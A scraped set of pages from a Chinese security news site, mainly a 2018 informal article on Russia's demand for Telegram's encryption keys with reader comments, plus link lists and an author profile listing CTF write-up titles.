[19]http://www.etsi.org/deliver/etsi_etr/100_199/192/01_60/etr_192e01p.pdf

[20]https://github.com/daniestevez/gr-outernet/blob/master/lib/descrambler308_impl.cc#L72

[21]https://twitter.com/ea4gpz/status/786518040141717505

[22]https://github.com/daniestevez/gr-kiss

[23]https://github.com/daniestevez/free-outernet

[24]http://www.ax25.net/kiss.aspx

[25] http://aprs.org/outnet.html

[26]https://en.wikipedia.org/wiki/Amazon.com

[27]http://destevez.net/2016/10/reverse-engineering-outernet-time-and-file-services/

[28]https://github.com/daniestevez/free-outernet/issues/1

本文翻译自 gnuradio, 原文链接 。如若转载请注明出处。
安全知识

backahasten 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
带头大哥
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
backahasten
关注智能硬件安全和非传统攻击面
文章
6
粉丝
2
TA的文章
侧信道攻击——从喊666到入门之波形采集
2018-10-08 16:30:35
【技术分享】侧信道攻击,从喊666到入门之——差分能量攻击初探
2017-11-09 15:06:18
【技术分享】GNU Radio无线通信嗅探基础
2016-12-23 10:00:33
【技术分享】一个针对TP-Link调试协议(TDDP)漏洞挖掘的故事
2016-11-25 16:05:12
【技术分享】针对Outernet卫星信号的逆向工程
2016-11-14 09:59:37
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下(下)
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵:深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

telegram

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
全球没人能监控的聊天软件也要死了 — Telegram
阅读量 753079 | 评论 42

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-03-26 18:04:52

俄罗斯联邦安全局要求Telegram交出用户信息,Telegram宁死不送,败诉申诉又被驳回……

聊天软件天天都用,但是我们用的聊天软件其实!基本!都是!不安全的,你知道么?

今天要说的Telegram,原产地德国柏林,是一款全球知名度非常高的加密聊天工具,很多创业者、开发者们都在用,简单来说就是你用Telegram给朋友发消息,这消息只有你知你朋友知,再没有第三人晓得,有关部门、黑客组织、骗子团伙要是想知道,想监控聊天内容干点什么不光彩的勾当,甭管是谁都多余了,就是俩字“休想”。

这个世界上没人能监控我,老子名叫Telegram
空口无凭,我说Telegram特别安全,你就相信了么?那不能够,咱要讲道理,那Telegram是怎么敢号称这个世界没人能监控的呢?吹牛逼开始!

1、加密技术过硬
Telegram 为一对一的聊天提供端对端加密,加密模式是基于256位对称AES 加密,RSA 2048 的加密和Diffie-Hellman 的安全密钥交换协议。

协议极其优秀,兼具数学和工程之美,不仅加密基础非常完善,在工程上也很出色,Telegram传递的消息为函数,可扩展性相当强。

以上内容看不懂不要紧,就是想表达Telegram技术加密方式,那就是小母牛掉果汁里了——果真牛B!

Telegram自信自己的加密方式绝对安全,并且承诺:只要有任何人成功破解已拦截的通讯内容,就提供10万美元的奖金。目前只有一个人拿到过这笔奖金,不过他发现的也仅是一个可能会导致问题的隐患。

不仅如此漏洞收购平台Zerodium 对Telegram的漏洞还开出了最高 50 万美元的报价,Telegram的安全程度可见一斑。

一个漏洞50万美金!

2、功能设置贴心
聊天记录不支持服务器保留;

支持设定聊天记录定时销毁;

支持一键删除账户,删除了账户后,所有相关的资料也都一并销毁;

3、要脸不要钱
免费、非盈利、永不销售广告、拒绝接受外部投资;

不会发生被收购的情况,落入他人之手,改变公司原有的安全通讯初衷;

4、创始人牛逼
Telegram的创始人俄罗斯富豪Pavel Durov也是欧洲最大社交网络VK的创始人,高富帅,聪明有个性,在俄罗斯国内,以跟普京爸爸唱反调而著称。他在接受采访时表示,Telegram就是为了隐私和安全而生的,绝不向任何势力妥协。

Telegarm这么牛逼为啥要死了?
据路透社报道,Telegram 违反了俄罗斯法律,俄罗斯联邦安全局要求Telegram将用户信息存放在俄罗斯国内的服务器中,以便允许政府随时查看。如果Telegram不乖乖听话,将会面临全网屏蔽+封杀。前车之鉴,此前俄罗斯已经以同样的理由短暂屏蔽了微信和Line。

先是去年Telegram 因为拒绝给俄罗斯联邦安全局已保护国家安全为由提供访问用户数据的密钥而败诉,硬生生赔了 14000 美元(约合8万多人民币),Telegram家大业大,后台有创始人运营的基金会提供赞助,这点钱九牛一毛了,人家不在乎。

紧接着Telegram不服,又向最高法院提交申诉,20日刚传出消息Telegram的上诉被驳回了。这意味着什么呢?

1、要么乖乖交出密钥,但是Telegram就算完了,本来就是靠聊天加密这事儿挣钱的,交了密钥,通讯就不安全了,谁还用它的APP,没有用户爸爸们买账,还怎么做大做强走上人生巅峰?(来自心灵的拷问)

2、誓死不从,坚决不交出密钥,也是死路一条,Telegram至此就会被俄罗斯全境封杀,俄罗斯联邦安全局加上最高法院,还有普京爸爸,三座大山在上,英雄汉也想要认怂了。

选1选2都得死,事件背后究竟隐藏了多少不为人知的秘密,是人性的扭曲还是道德的沦丧,都顾不上了解了,且看 Telegram选几,或者能不能别出心裁找出第三条路呢?

让我们拭目以待,耐心等等,时间会告诉你答案。

Telegarm的遭遇,Twitter、Facebook和linkedin也没能幸免
随着俄罗斯对境内对信息监控变得更加严厉,Telegram并不是唯一受到影响的社交媒体和通讯平台,Twitter、Facebook和linkedin也面临着同样的严苛网络安全监管问题。

目前俄罗斯已经将社交媒体和通讯平台的网络安全监管问题法律化,要求这些平台将用户个人数据通通存储在俄罗斯境内,目前Twitter已经承诺实践本土化操作,Facebook尚未回应,linkedin选择拒绝,所以Linkedin目前已经被俄罗斯全线封锁屏蔽。

出于国家安全考虑,俄罗斯身体力行的把社交媒体和通讯工具通通作为监督的目标,下一个会是谁,这可不好说,但总会有下一个的,谁能跑得了呢?

用户隐私,通讯安全哪里还能找得到?
国外科技媒体Techworld将市面上安全程度较高的软件做了如下推荐

第一个推荐的就是WhatsApp。Telegram出现前,WhatsApp曾是大众比较看好的一款加密通讯软件,大部分的用户认为 WhatsApp 是安全的。但自从 WhatsApp 被Facebook收购,WhatsApp的安全性就被打上了大大的问号。为啥呢,因为“后爸”Facebook 的生意要想赚更多钱,那就很有可能出于利益考虑,利用WhatsApp 的数据。毕竟数据的金山就放到你面前,唾手可得,换你你能不动心么?

国内某知名公司的其中一项服务就是对加密的通讯内容进行解密读取,可以“随心所欲”进行通讯内容监控。其监控范围之广、数据挖掘之深,令人咂舌。

其实通讯软件自身的安全程度其实仅为安全问题的一部分。举个例子,如果手机没有锁屏密码的保护,或者密码干脆就是123456,我的天,不管用多安全的通讯软件都不能保证信息不被窃取。

不管怎么说,Telegram在保护用户通信安全和自由方面,已经做的很牛逼了,至于能不能和有关部门gang到最后,狗子只能满怀欣慰,送上祝福了。

参考链接
https://www.ifanr.com/504427

http://www.sohu.com/a/198582991_804262

https://www.techworld.com/security/best-secure-mobile-messaging-apps-3629914/

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/102545
安全客 – 有思想的安全新媒体
用户隐私 WhatsApp Telegram 通信密钥

聪明的狗子 官方小编 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
你全家都是黑客
换一个
|评论列表
匿名用户 · 2019-02-03 10:55:48 回复
Telegram选择了2, 但是通过提供内置的MTProto代理, 依然可以方便的使用

小虎 · 2019-01-03 15:17:57 7 回复
以国家安全问题查看个人隐私的行为都是耍流氓,

男科圣手 · 2018-08-14 22:15:45 回复
娱乐博主,不必在意。就算TG接受垃圾政府制裁,还有的是软件可选,Signal,Wire,Wickrme都不错。但是这种事可能一辈子都不会发生。

Helen · 2018-08-04 08:32:18 回复
那么有钱,搬家啊。

小虎 · 2018-04-03 18:01:18 2 回复
资本主义国家的民主自由呢

吃瓜群众 · 2019-01-09 15:55:54 2 回复
俄罗斯是社会主义

我不是黑客 · 2019-02-03 21:51:48 1 回复
不是苏联吗

Anonymous · 2019-01-21 01:19:21 回复
回初中重学政治、地理吧

妇科圣手 · 2018-08-14 22:12:31 回复
俄罗斯是例外

匿名用户 · 2018-03-29 15:02:52 回复
看到文章作者把贾老板的剧照放上来说这是tg创始人,我就知道差不多这文章不靠谱了,telegram总部又不在俄罗斯,现在法院判他交出key,他不交,然后俄罗斯把它封了,罚点钱,就完事了吧。

聪明的狗子 · 本文作者 · 2018-03-29 17:03:32 回复
贾老板这么有名?这周末刷剧就看贾老板了

匿名用户 · 2018-03-28 10:05:19 4 回复
只有我关注配图错了吗?Telegram创始人俄罗斯富豪Pavel Durov本人的配图,这不是电影《社交网络》的截图吗?这个人应该是 Justin Timberlake的照片吧

聪明的狗子 · 本文作者 · 2018-03-29 16:59:29 回复
hello 小伙子好眼力,感谢指正,原文内容已修正,《社交网络》还真没看过,mark下,好好看看,谢谢你呦

aveng · 2018-03-27 16:42:54 回复
不应当!!他只是一只小猫咪!!!

匿名用户 · 2018-03-27 01:45:25 回复
推荐:Chats、Whatsapp、Batmessenger 、Wire

匿名用户 · 2018-03-27 00:02:05 2 回复
作者有点蠢吧?文章里提到的那些软件和公司中国都不能用,也没死啊,难道俄罗斯市场比中国还大?

聪明的狗子 · 本文作者 · 2018-03-29 17:04:43 回复
你看到我的名字了么 我叫聪明的狗子 善待小动物 关爱你我他

白帽子 · 2018-03-27 07:14:29 1 回复
加强阅读理解能力……多吃瓜子……

陈大猫 · 2018-03-27 00:13:52 3 回复
标题中说死的意思,是指Telegram一直以安全聊天和私密聊天著称,也是大部分用户使用该聊天软件的意义所在。如果出现了一个第三方可以随时监管Telegram的聊天内容,那么对于相当多的用户来说该软件就失去了其存在价值,是否继续使用Telegram取决于用户,但是Telegram自己所引以为豪的聊天安全性和私密性也就不复存在了。

匿名用户 · 2018-03-26 23:56:23 回复
不可能

匿名用户 · 2018-03-26 20:46:12 1 回复
现在的端对端加密都要绑定手机,我用的batmessenger 很匿名安全

匿名用户 · 2018-03-26 19:25:34 6 回复
不要听风就是雨,总想搞个大新闻。

陆羽 · 2018-03-26 19:30:54 1 回复
1.俄罗斯已经驳回了Telegarm的上诉,如果没办法说服俄罗斯法院、安全部门,则必须提供 2.如果不提供会怎么样?创始人及核心团队是俄罗斯人,你觉得会没有办法搞定?

陈大猫 · 2018-03-26 19:32:55 2 回复
层主是在moha……

大表姐 · 2018-03-26 19:32:17 回复
tg 只是创始团队以俄裔人为主,实际资金、公司、员工都不在俄罗斯

陆羽 · 2018-03-26 19:33:46 回复
既然是俄裔,就会有很多很多办法了哦

小虎 · 2018-03-26 19:35:03 2 回复
Telegarm的秘钥还是分布式的,而且公司不属于俄罗斯

陆羽 · 2018-03-26 19:37:35 回复
那么,同样使用类似方法的暗网最大黑市,最后是如何被端掉的呢

我不是黑客 · 2018-03-26 20:44:43 回复
思路被搞不是技术原因

黑帽子 · 2018-03-26 19:38:45 1 回复
感觉和暗网的性质应该不太一样吧,暗网的是违法,这个也就是俄罗斯政府想要监管而已。

陆羽 · 2018-03-26 19:40:26 回复
提供密钥的监管?Telegram的法律团队驳回了这一说法,指出:“FSB关于加密密钥的论点是狡猾的。这就好像在说我从你的电子邮件中得到了一个密码,但我不控制你的电子邮件,我只是有可能控制。”

安全客主编 · 2018-03-26 19:16:38 2 回复
狗子姐姐的力心之作

陆羽 · 2018-03-26 19:09:37 1 回复
原以为Telegram是一个很牛逼的德国公司,没想到老板和团队是俄罗斯人,这下完了,被迫提供密钥,不然搞死、搞残、搞怀孕。看来最好的办法还是做一个开源、安全的聊天软件,然后让大家自己部署服务器?此处,想到了很火的——区块链?

大表姐 · 2018-03-27 09:18:52 1 回复
创始人已经退出俄罗斯国籍了 去了解下telegram的创始过程再来评价吧

匿名用户 · 2018-03-26 19:06:25 回复
推荐:Chats、QTox、Singal、Wire

兔几Atoo · 2018-03-26 18:56:27 回复
腻害,看得hin爽(*´▽`)ノノ

匿名用户 · 2018-03-26 18:46:35 回复
Twittwer?你可能对Twitter有什么误会吧

陈大猫 · 2018-03-26 18:50:14 回复
已修改

匿名用户 · 2018-03-26 18:20:33 1 回复
小姐姐表情包用的6啊

陈大猫 · 2018-03-26 18:08:10 5 回复
狗子姐姐写这个文章可以说非常辛苦了

shasock5 · 2018-03-26 18:58:51 回复
哇原来是狗子姐姐写的呀,看文风也像哈哈,狗子姐姐辛苦啦!

熊猫烧香作者 · 2018-03-26 18:20:43 4 回复
dog sone sister 辛苦了

聪明的狗子
嗷呜
文章
86
粉丝
18
TA的文章
2018首席安全官(CSO)国际高峰论坛(干货PPT下载)
2018-04-27 15:18:31
429首都网络安全日
2018-04-25 13:24:12
全球没人能监控的聊天软件也要死了 — Telegram
2018-03-26 18:04:52
带一本书回家过年|安全客季刊精华合辑
2018-02-14 18:17:33
带一本书回家过年|安全客季刊精华合辑
2018-02-14 10:27:04
输入关键字搜索内容
相关文章
针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究
《2018中国手机安全生态研究报告》App滥用权限,免流软件藏风险!
分析新型使用Telegram通信的Android木马
4月7日热点 – 芬兰第三大数据泄露案,130000余名用户明文密码泄露
TeleRAT:再次发现利用Telegram来定位伊朗用户的Android恶意软件
WhatsApp取证技术:如何在未Root的Android设备上解密数据库
Netflix因取笑用户的观影习惯引发轩然大波
热门推荐
文章目录
这个世界上没人能监控我,老子名叫Telegram
1、加密技术过硬
2、功能设置贴心
3、要脸不要钱
4、创始人牛逼
Telegarm这么牛逼为啥要死了?
Telegarm的遭遇,Twitter、Facebook和linkedin也没能幸免
用户隐私,通讯安全哪里还能找得到?
参考链接
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

一叶飘零

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
一叶飘零
个人博客:skysec.top
TA的文章
TA的评论
TA的收藏
TA的关注
TA的粉丝
2019安恒1月月赛Writeip-Web&Crypto&Misc
CTF
周末在家无聊,又刷了一次安恒月赛,以下是题解。
安全客 一叶飘零 2019-01-27 11:00:54 稿费: + 300 88225次阅读 2
JavaScript侧信道时间测量
Web安全 Javascript 侧信道攻击 HRT SCA
最近因为需求,需要测量JavaScript单个函数的执行时间,但由于精度问题,遇到了各种各样的问题,在此做简单记录。
安全客 一叶飘零 2019-01-27 10:30:24 稿费: + 300 54954次阅读 4
2018安恒杯11月赛-Web&Crypto题解
CTF Web安全 crypto
今天比赛繁多,在打xnuca的闲暇,做了下安恒月赛,以下是Web和Crypto的解题记录。
安全客 一叶飘零 2018-11-26 10:02:02 稿费: + 300 155765次阅读 19
当中国剩余定理邂逅RSA
RSA 密码学 crypto
实在不知道起什么标题,于是滑稽了一波。写这篇文章的起源是2018高校网络信息安全管理运维挑战赛的一道RSA题目,借此机会,将中国剩余定理与RSA的结合研究一下。
安全客 一叶飘零 2018-11-21 15:50:18 稿费: + 300 119685次阅读 5
session_start()&bestphp
CTF Web安全 Session
又是周末,又是CTF,还是pupil出的题,只能说,非常有趣了:bestphp、bestphp’s revenge,前者来自xctf final,后者来自2018LCTF。
安全客 一叶飘零 2018-11-19 09:39:33 稿费: + 300 123076次阅读 12
一题三解之2018HCTF&admin
CTF Web安全 unicode Session
有幸拿到了这道题的1血,也在赛后的交流讨论中,发现了一些新的思路,总结一下3个做法:伪造session、unicode欺骗、条件竞争。
安全客 一叶飘零 2018-11-13 10:30:05 稿费: + 300 107445次阅读 4
用sqlmap解题2018HCTF-Kzone
CTF Web安全 sqlmap injection
刚好周末,参加了一下HCTF,于是写篇文章记录一下。
安全客 一叶飘零 2018-11-12 14:59:27 稿费: + 300 110728次阅读 6
2018护网杯-web部分题解
CTF Web安全
护网杯刚结束,记录一下做出的3道web(1道赛后解出),很遗憾有一道java没能解出。
安全客 一叶飘零 2018-10-14 11:11:41 稿费: + 300 148298次阅读 3
2018安恒杯 – 9月月赛Writeup
CTF writeup
中秋放假,做了一下安恒月赛,记录一下题解。
安全客 一叶飘零 2018-09-24 10:00:59 稿费: + 300 195772次阅读 6
2018-noxCTF-Crypto-RSA
RSA crypto noxCTF
2018-noxCTF的密码题中有许多RSA的题目,正好最近在看RSA,于是就做了一下,难度。
安全客 一叶飘零 2018-09-12 15:30:42 稿费: + 300 53929次阅读 1
加载更多
勋章成就
稿费总计 12510
发表文章 49
参与讨论 47
关注
0
粉丝
99
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
一叶飘零
个人博客:skysec.top
TA的文章
TA的评论
TA的收藏
TA的关注
TA的粉丝
2019安恒1月月赛Writeip-Web&Crypto&Misc
CTF
周末在家无聊,又刷了一次安恒月赛,以下是题解。
安全客 一叶飘零 2019-01-27 11:00:54 稿费: + 300 88225次阅读 2
JavaScript侧信道时间测量
Web安全 Javascript 侧信道攻击 HRT SCA
最近因为需求,需要测量JavaScript单个函数的执行时间,但由于精度问题,遇到了各种各样的问题,在此做简单记录。
安全客 一叶飘零 2019-01-27 10:30:24 稿费: + 300 54954次阅读 4
2018安恒杯11月赛-Web&Crypto题解
CTF Web安全 crypto
今天比赛繁多,在打xnuca的闲暇,做了下安恒月赛,以下是Web和Crypto的解题记录。
安全客 一叶飘零 2018-11-26 10:02:02 稿费: + 300 155765次阅读 19
当中国剩余定理邂逅RSA
RSA 密码学 crypto
实在不知道起什么标题,于是滑稽了一波。写这篇文章的起源是2018高校网络信息安全管理运维挑战赛的一道RSA题目,借此机会,将中国剩余定理与RSA的结合研究一下。
安全客 一叶飘零 2018-11-21 15:50:18 稿费: + 300 119685次阅读 5
session_start()&bestphp
CTF Web安全 Session
又是周末,又是CTF,还是pupil出的题,只能说,非常有趣了:bestphp、bestphp’s revenge,前者来自xctf final,后者来自2018LCTF。
安全客 一叶飘零 2018-11-19 09:39:33 稿费: + 300 123076次阅读 12
一题三解之2018HCTF&admin
CTF Web安全 unicode Session
有幸拿到了这道题的1血,也在赛后的交流讨论中,发现了一些新的思路,总结一下3个做法:伪造session、unicode欺骗、条件竞争。
安全客 一叶飘零 2018-11-13 10:30:05 稿费: + 300 107445次阅读 4
用sqlmap解题2018HCTF-Kzone
CTF Web安全 sqlmap injection
刚好周末,参加了一下HCTF,于是写篇文章记录一下。
安全客 一叶飘零 2018-11-12 14:59:27 稿费: + 300 110728次阅读 6
2018护网杯-web部分题解
CTF Web安全
护网杯刚结束,记录一下做出的3道web(1道赛后解出),很遗憾有一道java没能解出。
安全客 一叶飘零 2018-10-14 11:11:41 稿费: + 300 148298次阅读 3
2018安恒杯 – 9月月赛Writeup
CTF writeup
中秋放假,做了一下安恒月赛,记录一下题解。
安全客 一叶飘零 2018-09-24 10:00:59 稿费: + 300 195772次阅读 6
2018-noxCTF-Crypto-RSA
RSA crypto noxCTF
2018-noxCTF的密码题中有许多RSA的题目,正好最近在看RSA,于是就做了一下,难度。
安全客 一叶飘零 2018-09-12 15:30:42 稿费: + 300 53929次阅读 1
加载更多
勋章成就
稿费总计 12510
发表文章 49
参与讨论 47
关注
0
粉丝
99
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank